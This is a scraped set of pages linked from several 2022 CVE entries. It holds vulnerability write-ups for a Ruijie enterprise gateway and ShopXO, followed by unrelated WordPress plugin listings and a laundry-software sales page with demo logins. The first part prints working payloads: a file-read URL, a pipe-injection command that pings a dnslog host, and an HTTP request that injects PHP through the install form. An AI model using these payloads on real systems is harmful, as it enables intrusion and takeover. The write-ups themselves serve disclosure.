RG-NBR-E Enterprise Gateway RG-NBR2100G-E was discovered to contain an arbitrary file read vulnerability via the url parameter in check.php.

**0x00 **Affected component(s)****

Affected: RG-NBR-E Enterprise Gateway RG-NBR2100G-E
Affected source code file：/check.php

**0x01 **Vendor of the product(s)** and **vulnerability type****

https://www.ruijie.com.cn/

Any file read vulnerability

**0x02 **Attack vector(s)****

Vulnerability file path ‘check.php’ ,

the ‘url’ parameter passed in is not strictly filtered.

It is directly brought into the function ‘indexAction’ — > file\_get\_contents($url),

resulting in an Any file read vulnerability,

which can read any file on the server.

**0x03 Suggest**

An issue was discovered in RG-NBR-E Enterprise Gateway RG-NBR2100G-E.

There is an Any file read vulnerability that can read any file on the server.

**0x04 **Source code analysis****

path：

/check.php

       
     function deleteFile($fileName)
        {
            $cmd = "rm -fr $fileName";
        public function indexAction() {
            $root = "/tmp/html/";
            $name = $_GET["url"];
            $url = $root.$name;
            if($name == FALSE){
                header("Location: /index.htm");
                exit();
            }
            if (file_exists($url)) {
                $fileContent = file_get_contents($url);
                echo $fileContent;
            } else if (file_exists($url.".gz")) {
                header("Content-Encoding: gzip");
                $fileContent = file_get_contents($url.".gz");
                echo $fileContent;
            } else {
                echo "404 Resource Not Found";
            }
        }

Vulnerability file path ‘check.php’ ,

the ‘url’ parameter passed in is not strictly filtered.

It is directly brought into the function ‘indexAction’ — > file\_get\_contents($url),

resulting in an Arbitrary file read vulnerability,

which can read any file on the server.

**Arbitrary file read vulnerability ：**

**payload：**

Read init.php PHP file：

    http://127.0.0.1:80/check.php?url=init.php

转载请注明：Adminxe's Blog » Ruijie-NBR Any file read vulnerability

CVE-2022-27983: Ruijie-NBR Any file read vulnerability – Adminxe's Blog

RG-NBR-E Enterprise Gateway RG-NBR2100G-E was discovered to contain a remote code execution (RCE) vulnerability via the fileName parameter at /guest_auth/cfg/upLoadCfg.php.

**0x00 **Affected component(s)****

Affected: RG-NBR-E Enterprise Gateway RG-NBR2100G-E
Affected source code file：/guest\_auth/cfg/upLoadCfg.php

**0x01 **Vendor of the product(s)** and **vulnerability type****

https://www.ruijie.com.cn/

Command Execution

**0x02 **Attack vector(s)****

Vulnerability file path ‘/guest\_auth/cfg/upLoadCfg.php’,

the ‘fileName’ parameter passed in is not strictly filtered.

It is directly brought into the command line and bypassed by payload ( | ),

resulting in a command execution vulnerability,

which can obtain server permissions.

**0x03 Suggest**

An issue was discovered in RG-NBR-E Enterprise Gateway RG-NBR2100G-E. There is a Command Execution that can execute any harmful command on the serveron to control the server。

**0x04 **Source code analysis****

path：

/guest\_auth/cfg/upLoadCfg.php

       
     function deleteFile($fileName)
        {
            $cmd = "rm -fr $fileName";
            $res = exec($cmd, $out, $status);
        }

the ‘fileName’ parameter passed in is not strictly filtered.

It is directly brought into the command line and bypassed by payload ( | ),

resulting in a command execution vulnerability.

**Command Execution ：**

**payload：**  

Feasibility of using Ping dnslog for detection：

    http://127.0.0.1:80/guest_auth/cfg/upLoadCfg.php?fileName=|ping p28b5r.dnslog.cn

转载请注明：Adminxe's Blog » Ruijie-NBR has a Command Execution vulnerability

CVE-2022-27982: Ruijie-NBR has a Command Execution vulnerability – Adminxe's Blog

ShopXO v2.2.5 and below was discovered to contain a system re-install vulnerability via the Add function in app/install/controller/Index.php.

Hello, in my code audit process, I found system reinstallation vulnerability in ShopXO 2.2.0-2.2.5, the details are as follows:

In app/install/controller/Index.php file，Add function.

Do not have permission to check visitors, also didn't check whether installed database (check the config/database.php exists

Then the add function resets the original database data and writes the data submitted in the POST to config/database.php, which can be injected into the code, resulting in RCE

Below is the attacked PayLoad

    POST /install.php?s=index/Add.html HTTP/1.1
    Host: xxxx
    User-Agent: xxxx
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    X-Requested-With: XMLHttpRequest
    Referer: http://xxxx/admin.php?s=index/index.html
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 137
    
    DB_TYPE=mysql&DB_HOST=192.168.195.185&DB_PORT=3306&DB_NAME=shopxo&DB_USER=root&DB_PWD=root'.phpinfo().'123&DB_PREFIX=sxo_&DB_CHARSET=utf8mb4
    
    

Then open any page to see the PHPInfo page

CVE-2022-28056: A system reinstall vulnerability was found in ShopXO · Issue #66 · gongfuxiang/shopxo

Cross-Site Request Forgery (CSRF) leading to Arbitrary File Upload vulnerability in Rara One Click Demo Import plugin <= 1.2.9 on WordPress allows attackers to trick logged-in admin users into uploading dangerous files into /wp-content/uploads/ directory.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Do you love the demos of the themes made by Rara Theme? Or, need a guideline for setting up the themes?

Then, all you need is this plugin!

Rara One Click Demo Import plugin will help you import the demo content, including settings of the widgets and the customizer, with a click.

The demo content will make your website look like the preview of a theme so that you get a basic guideline for making your website.

Once installed and activated, Rara One Click Demo Import will be accessible through **Appearance > Rara Demo Import**.

If you use Premium themes made by Rara Themes, go to Pro Theme Demo Import tab and just click on ‘Import Now’ button and your website will look like the demo of the activated theme in no time.

If you use free themes made by Rara Themes, download the demo files from your Theme Documentation page, upload it using ‘Upload Demo File’ button on this plugin, and click Import Now. As simple as that.

You can find the detail documentation here

If you need help, contact our support team here.

This plugin is based on the ‘Theme Demo Import’ plugin by Themely, https://wordpress.org/plugins/theme-demo-import/

As well as the improved WP Import 2.0 plugin by @humanmade, https://github.com/humanmade/WordPress-Importer.

**License**

Rara One Click Demo Import uses the script of  
‘Theme Demo Import’ plugin by Themely,  
https://wordpress.org/plugins/theme-demo-import/  
Licensed under the GNU General Public License v2.0,  
http://www.gnu.org/licenses/gpl-2.0.html

Rara One Click Demo Import uses ‘WordPress Importer’ plugin script  
https://github.com/humanmade/WordPress-Importer  
(C) 2016 @humanmade  
Licensed under the GNU General Public License v2.0,  
http://www.gnu.org/licenses/gpl-2.0.html

**Copyright**

Rara One Click Demo Import is distributed under the terms of the GNU GPL.

This program is free software; you can redistribute it and/or modify  
it under the terms of the GNU General Public License as published by  
the Free Software Foundation; either version 2 of the License, or  
any later version (at your own risk).

This program is distributed in the hope that it will be useful,  
but WITHOUT ANY WARRANTY; without even the implied warranty of  
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  
GNU General Public License for more details.

You should have received a copy of the GNU General Public License along  
with this program; if not, write to the Free Software Foundation, Inc.,  
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

**Method 1:**

On your WordPress admin dashboard  
Visit ‘Plugins > Add New’  
Search for ‘RARA One Click Demo Import’ and install the plugin.  
Activate ‘RARA One Click Demo Import ’ from your Plugins page.

**Method 2:**

Download the plugin from WordPress.org repository  
On your WordPress admin dashboard, go to ‘Plugins> Add New> Upload Plugin’.  
Upload the downloaded plugin file (rara-one-click-demo-import.zip) and click ‘Install Now’  
Activate ‘Rara One Click Demo Import’ from your Plugins page.

Once the plugin is activated, you will find the actual import page in **Appearance > Rara Demo Import**

**I have activated the Rara One Click Demo Import plugin. Where can I find the plugin?**

You will find the plugin in _wp-admin -> Appearance -> Rara Demo Import_.

**Where are the demo import files and the log files saved?**

The files used in the demo import will be saved to the default WordPress uploads directory. An example of that directory would be: ../wp-content/uploads/2017/03/.

The log file will be registered in the _wp-admin -> Media_ section.

**I can’t activate the plugin because of a fatal error. What can I do?**

_Update: There is an admin error notice, stating that the minimal PHP version required for this plugin is 5.3.2._

You want to activate the plugin, but this error shows up:

_Plugin could not be activated because it triggered a fatal error_

This happens because your hosting server is using a very old version of PHP. This plugin requires PHP version of at least **5.3.x**, but we recommend version _5.6.x_. Please contact your hosting company and ask them to update the PHP version for your site.

\- Tried several times installing "tour-operator.1.2.5" after installation an extra theme showed up, uninstalled, installed again, two themes total. - Reset WP, install again, same issue. - First import proccess gave error 500. Solved, second try imported demo, but with errors. - Reset WP again, tried multiple times, none of imported anything.

Superfast damage to your site.

Error 503 every time I try to upload demo import file.

don't install this plug! this will be damage to your website and then you must restore your website!

Nice! this plugin is very helpful and easy to use

I recently downloaded the Rara Travel Theme which installed fine. Even though I had read other peoples reviews stating the import does not work. I can state it worked fine for me first time. I am running the latest version of Wordpress as of 25/07/18 with WooCommerce and so far so good no issues. I have even created a Child Theme just in case of future Theme Updates. So don't believe these 1 Star reviews. I am relatively new to Wordpress and I managed just fine. Thank You to the programmer who wrote the Theme and provided the Demo Content all for Free by the way. Really! Thank You!

Read all 7 reviews

“Rara One Click Demo Import” is open source software. The following people have contributed to this plugin.

Contributors

*    Rara Theme

**1.2.9**

*   WORDPRESS 5.6 AND PHP 8 COMPATIBILITY FIXES

**1.2.8**

*   ARRAY OFFSET ACCESS SYNTAX WITH CURLY BRACES FIXED

**1.2.7**

*   LINKS UPDATED

**1.2.6**

*   UPLOAD BUTTON ISSUE FIXED

**1.2.5**

*   INFORMATION ADDED

**1.2.1**

*   COMPATIBILITY TEST

**1.2.0**

*   MAJOR UPDATE
*   DEMO FILE ZIP NAME STANDARDS

**1.1.0**

*   WARNING MESSAGE FIXED

**1.0.9**

*   WARNING MESSAGE FIXED

**1.0.8**

*   CODE CLEAN UP & DESIGN FIXES

**1.0.7**

*   CODE CLEAN UP
*   SOME OPTIONAL FUNCTIONS REMOVED

**1.0.6**

*   DEMO IMPORT PROCESS EASED

**1.0.5**

*   RARA THEME DEPENDENT

**1.0.4**

*   COMPATIBILITY TEST

**1.0.3**

*   PLUGIN DEPENDENCY CHECK
*   COMPATIBILITY TEST

**1.0.2**

*   CODE CLEANUP

**1.0.1**

*   CLASSES ADDED
*   FILTERS ADDED

**1.0.0**

*   INITIAL RELEASE

CVE-2022-29451: Rara One Click Demo Import

Multiple (13x) Cross-Site Request Forgery (CSRF) vulnerabilities in WPKube's Subscribe To Comments Reloaded plugin <= 211130 on WordPress allows attackers to clean up Log archive, download system info file, plugin system settings, plugin options settings, generate a new key, reset all options, change notifications settings, management page settings, comment form settings, manage subscriptions > mass update settings, manage subscriptions > add a new subscription, update subscription, delete Subscription.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Subscribe to Comments Reloaded is a robust plugin that enables commenters to sign up for e-mail notification of subsequent entries. The plugin includes a full-featured subscription manager that your commenters can use to unsubscribe to certain posts or suspend all notifications. It solves most of the issues that affect Mark Jaquith’s version, using the latest WordPress features and functionality. Plus, allows administrators to enable a double opt-in mechanism, requiring users to confirm their subscription clicking on a link they will receive via email or even One Click Unsubscribe.

**Requirements**

*   WordPress 4.0 or higher
*   PHP 5.6 or higher
*   MySQL 5.x or higher

**Main Features**

*   Easily manage and search among your subscriptions
*   Imports Mark Jaquith’s Subscribe To Comments (and its clones) data
*   Messages are fully customizable, no poEdit required (and you can use HTML!) with a Rich Text Editor – WYSIWYG
*   Disable subscriptions for specific posts
*   One Click Unsubscribe
*   Get and Download your System information for better support.

**Language Localization**

If you would like to help out translating the plugin to your language you can do so through the official WordPress plugin translation system

1.  If you are using Subscribe To Comments by Mark Jaquith, disable it (no need to uninstall it, though)
2.  Upload the entire folder and all the subfolders to your WordPress plugins’ folder. You can also use the downloaded ZIP file to upload it.
3.  Activate it
4.  Customize the Permalink value under Settings > Subscribe to Comments > Management Page > Management URL. It **must** reflect your permalinks’ structure
5.  If you don’t see the checkbox to subscribe, you will have to manually edit your template, and add <?php global $wp_subscribe_reloaded; if (isset($wp_subscribe_reloaded)){ echo $wp_subscribe_reloaded->stcr->subscribe_reloaded_show(); } ?> somewhere in your comments.php
6.  If you’re upgrading from a previous version, please **make sure to deactivate/activate** StCR.
7.  You can always install the latest development version by taking a look at this Video

**Are there any video tutorials?**

Yeah, I have uploaded a few videos for the following topics:

1.  Issues Updating StCR via WordPress Update
2.  Issues with StCR links see StCR Clickable Links
3.  Issues with empty emails or management messages? see StCR Management Message
4.  Upgrading from the latest development version see Upgrading

**Why my notifications are not in HTML format?**

Don’t worry, just go to the Options tab an set to Yes the **Enable HTML emails** option.

**How can I reset all the plugin options?**

There is a new feature called **Safely Uninstall** that allow you to delete the plugin using the WordPress plugin interface. If you have the option set to **Yes** everything but the subscriptions created by the plugin will be wipeout. So after you made sure that you have this option to **Yes** you can deactivate the plugin and the delete it. Now you have to install the plugin via WordPress or Upload the plugin zip file and activate it, after this step all your settings will be as default and your subscriptions will remain.  
There is a new feature added on the Options tab where you can reset all the settings by using only one click. You can either wipe out all the subscriptions or keep them.

**What can I do if the \*\*Safely Uninstall\*\* does not have any value?**

Just deactivate and activate the plugin and you are all set. The default value will be **Yes**.

**Aaargh! Were did all my subscriptions go?**

No panic. If you upgraded from 1.6 or earlier to 2.0+, you need to deactivate/activate StCR, in order to update the DB structure. After the version 180212 a fix was applied so that you can see all the subscriptions.

**Can I customize the layout of the management page?**

Yes, each HTML tag has a CSS class or ID that you can use to change its position or look-and-feel.

**How do I disable subscriptions for a given post?**

Add a custom field called stcr_disable_subscriptions to it, with value ‘yes’

**How do I add the management page URL to my posts?**

Use the shortcode [subscribe-url], or use the following code in your theme:  
global $wp\_subscribe\_reloaded; if (isset($wp\_subscribe\_reloaded)){ echo ‘Subscribe“;

**Can I move the subscription checkbox to another position?**

Yes! Just disable the corresponding option under Settings > Comment Form and then add the following code where you want to display the checkbox:  
stcr->subscribe\_reloaded\_show(); } ?>

**What if after update to the version 141024 I still see plain HTML messages?**

The information of your configuration needs to be updated. Go to the Subscribe to Comments Reloaded settings and click the Save Changes button on the tab  
where you have you messages with HTML.

**How to generate a new Key for my Site?**

Just go to the Options Panel and click the generate button. By generating a new key you prevent the spam bots to steal your links.

People from my website, who made subscription for comments, said that in e-mail they get the IP of user, who left the comment. I\`m going to find another plugin.

I have the v.210315 I translated it into Italian 100% with Loco translated, but I noticed that in the plugin there are still many entries in English.

Just installed this as an alternative to setting up a forum, which seemed too much like hard work! Love it so far, very easy to set up and I like the fact that every item has a "?" so you can find out what it means before setting it.

Believe me guys, I tried all the plugins out there available for comment subscription and this is the only plugin that is robust, reliable and with continuous support from the author for a very long time. And guess what it's completely free. Thanks a lot for this wonderful plugin. All the best for your great success.

A fabulous plugin that helps people to stay engaged with the posts they appreciate much. Thank you!

If I had written design specs for a plugin and commissioned someone to write it, the result would not have been as good as this plugin is. Setting up this plugin it quickly becomes apparent that a lot of real-world experience has been incorporated into it over the years. The end result is, that it works like a dream and totally exceeds my expectations. Thanks so much!

Read all 156 reviews

“Subscribe To Comments Reloaded” is open source software. The following people have contributed to this plugin.

Contributors

*    WPKube

**v211130**

*   **Fix** Removed custom error handler (thanks to JakeQZ for bringing the issue to our attention)
*   **Fix** Processing form submission in subscribe.php is now stopped in case “subscribe without commenting” is enabled

**v211019**

*   **Fix** Issue with STCR output on non-virtual management page

**v210315**

*   **Fix** Removed the “need help” added via “contextual\_help” (deprecated)
*   **Fix** PHP 8 deprecated notice
*   **Fix** Fix issue with missing submit button when using “stcr\_disable\_subscription” custom field
*   **Tweak** Bump up WP “tested up to” version to 5.7

**v210126**

*   **New** Option to disable the “subscribe without commenting” and “request management link” pages. ( WP Admin > StCR > Management Page )

**v210110**

*   **Fix** Limit subscription types on the management page when only a specific subscription is allowed
*   **Fix** JS error on front-end

**v210104**

*   **New** Google reCAPTCHA now available for the “subscribe without commenting” and “request management subscription” form (WP admin > StCR > Options)
*   **Improvement** When using the checkbox (not the select box from advanced subscription) you can now select the subscription type (all or replies) (WP admin > StCR > Comment Form)
*   **Improvement** \[comment\_author\] can now be used in the Notification subject (WP admin > StCR > Notifications)
*   **Improvement** Replaced final instances of jQuery code to be raw JavaScript (not rely on jQuery)
*   **Fix** The form to “request management link” will now check if that email is a subscriber before sending a link
*   **Fix** Issue with broken option tooltips on Notifications settings page
*   **Tweak** Removed HTML comments around the plugin’s output on the frontend

**v200813**

*   **Fix** Error when permanently deleting a post/page/… (related to WP 5.5 change in the “delete\_post” hook coming with a 2nd parameter)

**v200629**

*   **New** Option to show the subscription checkbox/select only for logged in users (option called “Enable only for logged in users” and located in WP admin > StCR > Options)
*   **New** Added \[comment\_date\] and \[comment\_time\] shortcodes which can be used in the “notification message”.
*   **Improvement** Challenge question/answer now shows on “request management link” page as well
*   **Improvement** Replaced multiple instances of jQuery code to be raw JavaScript (not rely on jQuery)
*   **Tweak** Added label for the checkbox in “Screen Options”
*   **Tweak** Email input value fallback to “email” removed
*   **Fix** Subscriptions will no longer duplicate when post is copied/duplicated with the “Duplicate Post” plugin
*   **Fix** Fixed issue with PHP notice when $comment object does not have comment\_approved set
*   **Fix** The jQuery code that handles moving the position of the checkbox is now added later on in the code to avoid issue when jQuery gets loaded in the footer

**v200422**

*   **New** Arabic translation, thanks to Yaser Maadan
*   **Fix** WP\_PLUGIN\_URL replaced by plugins\_url()
*   **Fix** Issue with “generate new key” button for “StCR Unique Key” not working (WP Admin > StCR > Options)
*   **Fix** Issue with ordering by date in the subscription management table (WP Admin > StCR > Manage subscriptions)
*   **Fix** Issue with management page ( /comment-subscriptions/ ) being shown for child pages as well ( /comment-subscriptions/something-else/ )
*   **Fix** Corrections in Hungarian translation
*   **Tweak** Some other minor tweaks

**v200205**

*   **New** Function for developers to add subscribers. Check the guide
*   **New** Option to set a challenge (question + answer) for the “subscribe without commenting” form to prevent automatic bot submissions
*   **Fix** It is now possible to send out plain text emails instead of HTML emails. Check the guide
*   **Fix** It is now possible for visitors to subscribe to comments when the comments are only open for logged in users and the visitor is not logged in
*   **Fix** Corrections in German translation

**v191217**

*   **Improvement** Option to enable/disable the plugin from setting cookies (email address after subscription)
*   **Improvement** German translation improvements (thanks to Greendroid)

**v191209**

*   **Improvement** Logged in users no longer need to submit the “email” form on a subscription page in order to access their subscriptions
*   **Improvement** Ability to filter/search the subscriptions table ( WP admin > StCR > Manage Subscriptions ) when there are more than 1000 subscriptions

**v191028**

*   **Fix** Issue with “Default Checkbox Value” not being saved
*   **Fix** Issue with /comment-subscriptions taking to 404 ( when it does not end with / )
*   **Tweak** Error notification when \[manager\_link\] used in “Management Page message”.

**v191011**

*   **Fix** Revert changes to error logging due to PHP errors/warnings

**v191009**

*   **Fix** Issue with post slug being displayed instead of the post title on unsubscribe
*   **Fix** HTML validation error in subscribe template
*   **Fix** Fix German translation “Nicht abonnieren”
*   **Fix** Fix import data from Subscribe Reloaded by Mark Jaquith
*   **Fix** Issue with using double quotes in options
*   **Tweak** Show a message to the comment author to check his email to confirm subscription
*   **Tweak** Performance improvement for error logging

**v190529**

*   **Fix** Issue with being unable to dismiss admin notices shown by StCR
*   **Fix** Virtual management page was still being shown even when disabled

**v190523**

*   **Fix** Remove the old system information functionality

**v190510**

*   **New** Option to only enable the functionality for blog posts ( option named “Enable only for blog posts” located in WP admin > StCR > StCR Options)
*   **Tweak** Info on subscriber and subscriptions amount moved into separate table
*   **Fix** Text domain

**v190426**

*   **New** Info on the amount of subscribers and subscriptions added in WP admin > StCR > StCR System
*   **Fix** Text domain (for translations) has been changed to the correct domain (from subscribe-reloaded to subscribe-to-comments-reloaded)
*   **Fix** Issue with undefined is\_rtl function
*   **Fix** Missing blank space between sentences (below comment form when subscribed)
*   **Fix** Undefined variable notices for $order\_status and $order\_dt
*   **Fix** Temporarily hidden an unused option in StCR > Management Page to avoid confusion.
*   **Fix** Removed localization for non textual strings
*   **Fix** Fixed incorrectly localized textual strings

**v190412**

*   **Fix** Issue with JavaScript code that is supposed to show the form when “StCR Position” is enabled

**v190409**

*   **Fix** Post author was notified of new comments even if they are awaiting approval, no need for this since WordPress itself sends out an email in that case
*   **Fix** Post author was notified twice ( if he was subscribed and “subscribe authors” was enabled )
*   **Fix** Issue with “StCR Position” option ( for older/outdated themes ) not working properly
*   **Fix** Issue with wrong translation in German
*   **Tweak** The “Action” select box labels on “Manage Subscriptions” page tweaked to be more descriptive

**v190325**

*   **New** Shortcode for manage page content (to be used on non-virtual management page). The shortcode is \[stcr\_management\_page\]
*   **Rewrite** New method for downloading system information file
*   **Fix** The admin panel CSS and JavaScript files now load only on StCR pages
*   **Fix** Tooltips not showing up on System options page
*   **Fix** Conflict with MailChimp for WP plugin (comment filter received echo instead of return which caused the issue)
*   **Fix** Issue with select/deselect all on management page
*   **Tweak** The MySQL requirements info on the system page now uses WordPress requirements
*   **Tweak** The post author will no longer be notified of his/her own comments

**v190305**

*   **Fix** Issue with “Subscribe authors” functionality sending the emails to administrator instead of the post author

**v190214**

*   **Fix** String error calling the Curl Array.
*   **Fix** wrong array definition that was breaking the site in some newer PHP versions.
*   **Fix** error by calling $wp_locale that was not needed.
*   **Fix** wrong label on option issue #467.
*   **Fix** typo en help description issue #468.

**v190117**

*   **Fix** missing checkbox when the option **StCR Position** was set to **Yes**.
*   **Fix** styles on admin notices.
*   **Fix** filenames to match the correct menu name.
*   **Fix** \# issue#431 and issue#444.
*   **Fix** warning message that was notifying the server when the Management URL was empty. Now the field must have a value. Props @breezynetworks on WordPress Forum
*   **Fix** value of management page to get it on the event insteadof page load.
*   **Add** translation for Subs Table, Add PHP error logger.
*   **Add** Plugin information on Cards.
*   **Add** the Phing build script to automate the deployment and testings.
*   **Add** WebUI Popover library to display the help messages in a clear way.
*   **Add** dropdown menu on the options tab to include the System menu.
*   **Add** option to download the system report.
*   **Add** functionality to create the system report via Ajax.
*   **Add** cron to clean house the system report file.
*   **Upgrade** the **Comment Form** Panel 2 options.
*   **Upgrade** the **Management Page** panel.
*   **Upgrade** the **Options** Panel.
*   **Upgrade** the **Support** Panel.
*   **Upgrade** the **StCR System** Menu.
*   **Update** font awesome refrences.
*   **Update** Admin Menus with Bootstrap.
*   **Implement** Pagination using plugins and fix responsive layout of management page.
*   **Implement** SASS for the CSS files.
*   **Implement** a cache array for the menu options.
*   **Remove** unecessary components from Composer.
*   **Remove** double inclusion of Font Awesome.
*   **Modify** Bower, Gulp and Phing files to implement WebUI Popover.
*   **Refactor** the options saving process.
*   **Refactor** code to move the functional saving options to the Utils Class.
*   **Set** the Double Verification option to yes.
*   **Create** array of options for improve support.
*   **Sanitize** input and out of data preventing XSS. Code modification and suggestion by @jnorell.
*   **Re Word** option to avoid missleading to new users. Props @padraigobeirn.
*   **Move** the plugin core files to the folder **src** in order to implement npm and bower task managers.

**v180225**

*   **Fix** error when a user subscribe to a new post and the double opt-in was enable, preventing the double opt-in not sending the email message. Issue#350.
*   **Add** email and post id validation on the StCR backened.
*   **Add** email, search and post id validation on the frontend.
*   **Add** backened validation for input data (email) on the subscribe and request management pages.
*   **Add** debug messages to improve support.
*   **Add** feature to change the date format output on the management page for both the User page and Author. See issue#345.
*   **Remove** the inclusion of the plugin scripts with WP enqueue. This will load only the needed script on specific pages. Will remove request to the server to get scripts.

CVE-2022-29414: Subscribe To Comments Reloaded

Red Planet Laundry Management System 1.0 is vulnerable to SQL Injection.

**About Us**

We **Red Planet Computers** has started development in Laundry Management System in 2017. We have 7+ years experience in development, customization and implementation Web, Mobile application Services.

*   Well and Experienced Staff.
*   User Friendly Services
*   24x7 remote support servies

Our team have hands-on experience in all aspects of IT planning, deployment, operational management and maintenance support. Our design consultants design solutions that fit best within your environment and help achieve your laundry business goals – working with you as trusted advisors to help determine the best solution for your laundry business.

See More

**Development Skills**

**Laundry Management System Developed in following skills**

Our professional and experience developers team are used skill to the top most computer launguages and framworks for ui design, developement, making user friendly and secure laundry application for small business.

Boostrap & CSS _Website and Admin UI Design_

Javascript & Ajax _Website Development_

PHP Codeigniter & Mysqli _Website and Admin Panel_

Flutter, Swift and Kotlin _Android, iOS Mobile App_

**Screenshots**

Here some application UI screens to help you how its look and work LMS Application

*   Admin
*   Website
*   Mobile

**Pricing**

**RPL Standard Package  
(Point Of Sale\*)****INR 30K USD $399/- for lifetime**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS Screen Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI
*   One Year Free Service & Updates.

Buy Now

**RPL Professional Package  
(E-Commerce\*)****INR 50K USD $649/- for lifetime**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS+E-Comm Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI (Mobile, Website)
*   One Year Free Service & Updates.

Buy Now

**RPL Development Package  
(Customization\*\*)****Extra 50% POS+50% (OR) E-Commerce+50%**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS/E-Commerce Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
*   Mobile(Android, iOS) App
*   Customer / Driver App
*   Customer Front-End Website
*   Payment Gateway
*   Customized UI (Mobile, Website)         \[ as per your requirements\*\* \]
*   One Year Free Service & Updates.

Buy Now

\* Terms and Conditions apply (see FAQ section )  
\*\* Cost may vary depends on the customization

**Frequently Asked Questions**

Here are some of the most Frequently Asked Questions for Laundry Management Systems.

*   Can we get all liceses for lifetime ?
    
    Ans : Yes, if you purchase application with full source code then it's one-time payment and you will get multiple digital license \[lifetime\]. The amount is non-refundable , Once if you have got full source code then you will not getting return amount for any circumstances.
    
*   After purchase full source code can we sell this software ?
    
    Ans : Yes, after purchase application with full source code then you can use or sell anywhere with remove red planet computers company logo and name.
    
*   Can you will provide full source code ?
    
    Ans : Yes, you should have to pay 100% amount, if you want application with full source code. We will send full source code (zip or download link ) within half hours after successfully payment done. We will not provide any kind of equipment. Only RPL Business Package we will not provide source files.
    
*   What is **RPL Development / Customization Package** ?
    
    Ans : If you want manipulation or any changes in application through our professional developer team then you will have to pay selected (standard or professional) package amount plus extra 50% amount for manipulation charges. **Firstly, you have to pay 70% amount of total amount** and remaining 30% amount to pay after project completed, but note that in this period you will not getting full source code, you will getting our web hosting softwares link for testing, after completed project and 100% payment done then we will upload full source code in your website/web hosting server or send full source code link).  
    \- As per your requirement, project will be completed within 20-25 days or earlier.  
    \- Bulk SMS, Payment Gateway, Apple App Store, Google Map API & Play Store Console charges you will have to pay, if you are require.
    
*   Service and Support ?
    
    Ans : We will provide a FREE technical support upto one year after purchase LMS Application. We will answer your question regarding website management, technical details or anything about operating your own website; we can provide this through remotly in 24x7 Hours.
    

**Free Trail Full Version**

Not required fill any personal information or credit card details just click on button and login it

Username : admin  
Password : 1234  
\[ Admin Login Details \]

  
Best view in Desktop or Laptop

Mobile : 8767228990  
Password : 1983  
\[ Demo User Login Details \]

  
Best view in Desktop or Laptop

User Mobile : 8767228990  
Driver Mobile : 1234567890  
\[ Demo User / Driver Login Details \]

   
iOS app install : Download and Extract zip in Mac-OS then drag-drop .app file on Xcode 10+ simulator or connected iphone {iOS v10.0+}.

**Contact**

You can call to us 24x7 regarding Laundry Management System enquiry or solutions

**Location:**

B-02, Sai Sanklap Complex, Survey No. 145/0,  
Usarli Khurd, Panvel, Mumbai, India 410206

**Call:**

Mobile : +91 87672 28990.  
Whatsapp : +91 87672 28990.  
Skype : rpcits2013 / +918767228990.

CVE-2022-28452: Better solutions for Small Laundry and Dry Cleaning Business

**About Us**

We **Red Planet Computers** has started development in Laundry Management System in 2017. We have 7+ years experience in development, customization and implementation Web, Mobile application Services.

*   Well and Experienced Staff.
*   User Friendly Services
*   24x7 remote support servies

Our team have hands-on experience in all aspects of IT planning, deployment, operational management and maintenance support. Our design consultants design solutions that fit best within your environment and help achieve your laundry business goals – working with you as trusted advisors to help determine the best solution for your laundry business.

See More

**Development Skills**

**Laundry Management System Developed in following skills**

Our professional and experience developers team are used skill to the top most computer launguages and framworks for ui design, developement, making user friendly and secure laundry application for small business.

Boostrap & CSS _Website and Admin UI Design_

Javascript & Ajax _Website Development_

PHP Codeigniter & Mysqli _Website and Admin Panel_

Flutter, Swift and Kotlin _Android, iOS Mobile App_

**Screenshots**

Here some application UI screens to help you how its look and work LMS Application

*   Admin
*   Website
*   Mobile

**Pricing**

**RPL Standard Package  
(Point Of Sale\*)****INR 25K USD $349/- for lifetime**

*   **Full 100% Source Code  
    Free Source Code for testing Click Here**
*   **License - Lifetime (25 Years)**
*   **Payment - One Time Payment** \[No need Renew/Payment every year\]
*   **Install - Unlimited Devices**
*   Bootstrap Admin Panel
*   Multi-Store Management
*   Multi-user Management
*   POS Screen Management
*   Multi-Launguage Management
*   Barcode Tag Management
*   POS/Laser Printer Management
*   Discount/Taxes Management
*   World Currency Management
*   Wallet/Credit Management
*   Laundry Packages Management
*   SMS, Email Management
*   Profit/Loss Reports
*   Daily/Monthly Reports
